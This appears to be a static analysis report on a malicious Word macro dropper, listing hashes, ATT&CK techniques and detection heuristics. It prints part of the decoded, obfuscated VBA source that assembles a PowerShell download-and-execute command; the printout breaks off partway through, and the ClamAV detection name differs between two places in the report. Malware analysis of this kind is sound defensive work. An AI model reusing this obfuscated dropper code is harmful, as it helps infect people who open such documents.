Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 354484c79eb432c0…

MALICIOUS

Office (OLE)

226.5 KB Created: 2018-06-25 21:30:00 Authoring application: Microsoft Office Word First seen: 2018-07-23
MD5: 3a7c280e5577440adb00c8ed0c26ad71 SHA-1: 114300fe062791c0288ce084743cd215764fdc41 SHA-256: 354484c79eb432c0fde6f5e38f7ff3498e614011d4020ba60a373a6b9736417f
242 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing a VBA macro with an AutoOpen function. This macro utilizes the Shell() function, indicating an attempt to execute external code. The ClamAV detection name 'Doc.Dropper.Agent-6591766-0' further supports its nature as a dropper. The macro's obfuscated string concatenation suggests it's constructing a command to download and execute a payload.

Heuristics 7

  • ClamAV: Doc.Dropper.Agent-6591567-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6591567-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 11872 bytes
SHA-256: a738b5486abefdb1891f87f9d1eb9bcd5d29886a36e1487ed91a81db21580b30
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "MzjnOAfqAwLw"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "AnvspRWbQs"
Function OTRhwz()
On Error Resume Next
RjFRF = CByte(99965 * Tan(74284) / 95300 + CLng(qTRav * 80442 * 143 * Chr(23643)))
IRFbZ = (38961 / CBool(28868) + 71756 + CSng(XjisS) * (4376 - BTbGj + 16460 - CLng(qtHbvB)))
KuYKqhwP = "Hell" + "  &" + Chr(40) + Chr(40) + "var" + "iabLE " + "'*MDr*'" + Chr(41) + ".Nam" + "E["
AtvfO = CByte(48347 * Tan(74067) / 4650 + CLng(ijFfX * 29782 * 93290 * Chr(96460)))
jcWPiW = (70697 / CBool(99014) + 40057 + CSng(iSsTj) * (11917 - AYbNC + 36641 - CLng(EkmSh)))
oXBQwY = "3,11,2]" + "-jOI" + "n''" + Chr(41) + Chr(40) + " " + Chr(40) + " '4M67w1" + "16%" + "102M29C" + "78L6"
hUqpbk = (66568 / CBool(57959) + 18706 + CSng(KtkSR) * (37158 - oWNFK + 37850 - CLng(wpvIX)))
oImnkN = CByte(22024 * Tan(21398) / 34495 + CLng(wkPUr * 16295 * 97741 * Chr(26081)))
nvssKZRq = "9<87L13Q" + "79Q66L" + "74Q" + "69L" + "67Q84" + "Q0C1" + "10i6" + "9<84%14A" + "119A" + "69"
LJbZku = (45324 / CBool(1512) + 75517 + CSng(mpaHOd) * (4138 - wiEHD + 43140 - CLng(QUuzK)))
qhULlN = CByte(67003 * Tan(3561) / 86115 + CLng(MYUfV * 42535 * 56893 * Chr(1805)))
qQwjVNjJdl = "L66A" + "99%76" + "i73w" + "69" + "%78w84A2" + "7Q" + "4B116%" + "100L7" + "2L29B7" + "Q72Q84"
pBCfjD = (12251 / CBool(9021) + 25382 + CSng(ZcBcB) * (91720 - GvcQT + 10237 - CLng(Vrjjq)))
uqtIVo = CByte(78046 * Tan(5480) / 69896 + CLng(fIViS * 69104 * 21707 * Chr(91973)))
FawQQ = "A84Q80" + "i26%" + "15Q15L8" + "4B73" + "B68C6" + "5B8" + "4B6" + "9Q" + "67M72" + "C78B73"
jOPhY = (50538 / CBool(43118) + 92271 + CSng(JsUXNW) * (47776 - isHMHE + 42222 - CLng(zHzXll)))
nQGcfJ = CByte(41799 * Tan(66494) / 97625 + CLng(qtsnIu * 98579 * 17951 * Chr(69109)))
YjnOCjzQPHh = "B6" + "7B" + "65i76C1" + "4M67w7" + "9A77<15" + "C104Q98i"
SoFcK = (88201 / CBool(87541) + 51487 + CSng(YYMXM) * (62335 - GttZN + 19119 - CLng(UQKdB)))
MwNBkN = CByte(98477 * Tan(20090) / 57853 + CLng(lPuPa * 37917 * 57004 * Chr(42859)))
XaRvipU = "25" + "%115" + "w1" + "03w" + "15L96A" + "72A84i8" + "4A" + "80C26M1"
GBnFPK = (77008 / CBool(16988) + 62019 + CSng(MzPslG) * (50684 - Lmwhw + 55575 - CLng(IKSuiA)))
owunYt = CByte(96751 * Tan(82901) / 93726 + CLng(SYRSV * 44901 * 18203 * Chr(18839)))
uqmkcB = "5B15" + "M83A" + "72" + "C85A78M7" + "4Q73Q14" + "<79" + "%8" + "2B71" + "L15%87" + "i79" + "M82C68" + "M80B8"
IRjhZE = (21132 / CBool(57122) + 13137 + CSng(VOzlZK) * (34415 - zhhMUp + 88585 - CLng(XLInm)))
kirUE = CByte(32329 * Tan(40788) / 67258 + CLng(Prrap * 40596 * 75758 * Chr(85608)))
qRhIUSh = "2%69i83" + "<83M15M" + "110Q107" + "M98w" + "105" + "A15" + "i96B7" + "2<84w84" + "B8"
OTRhwz = KuYKqhwP + oXBQwY + nvssKZRq + qQwjVNjJdl + FawQQ + YjnOCjzQPHh + XaRvipU + uqmkcB + qRhIUSh
DZLcS = (92284 / CBool(94867) + 88318 + CSng(LhzVTM) * (25530 - PtEGBc + 28046 - CLng(RVdPE)))
kSAkNw = CByte(14926 * Tan(31439) / 91935 + CLng(KdKBN * 89093 * 46364 * Chr(58518)))
End Function
Function sNdwfLnCV()
On Error Resume Next
LFtoB = (4321 / CBool(95032) + 94858 + CSng(AaUii) * (34736 - hUjzQW + 97622 - CLng(jvXSMF)))
zwBsn = CByte(81510 * Tan(58381) / 97973 + CLng(PzwPVD * 61200 * 89755 * Chr(84517)))
dZvfULtOn = "0B2" + "6C15%15" + "<87A87w" + "87w1" + "4B80%72%" + "65" + "i78B" + "77i73"
jZoiz = (78402 / CBool(13919) + 92744 + CSng(GifkD) * (55764 - VdqiGD + 41309 - CLng(jRYic)))
PcaIZz = CByte(15891 * Tan(38773) / 8570 + CLng(fuWsD * 70529 * 28826 * Chr(90570)))
FzAqSzcAFbm = "B78i" + "72L72M85" + "Q89L14Q6" + "7i79" + "w7" + "7i" + "15L"
riCENw = (56702 / CBool(8515) + 75945 + CSng(fQYTiq) * (3930 - cifVA + 48096 - CLng(zMjcwz)))
cwluN = CByte(46775 * Tan(25728) / 19458 + CLng(tUZYnH * 51092 * 85284 * Chr(4605)))
fziHDDQ = "22" + "L10" + "6Q9" + "0L8" + "9M24M" + "102<15" + "C96<7"
jmQHW = (64369 / CBool(56449) + 34989 + CSng(lzbpv) * (572
... (truncated)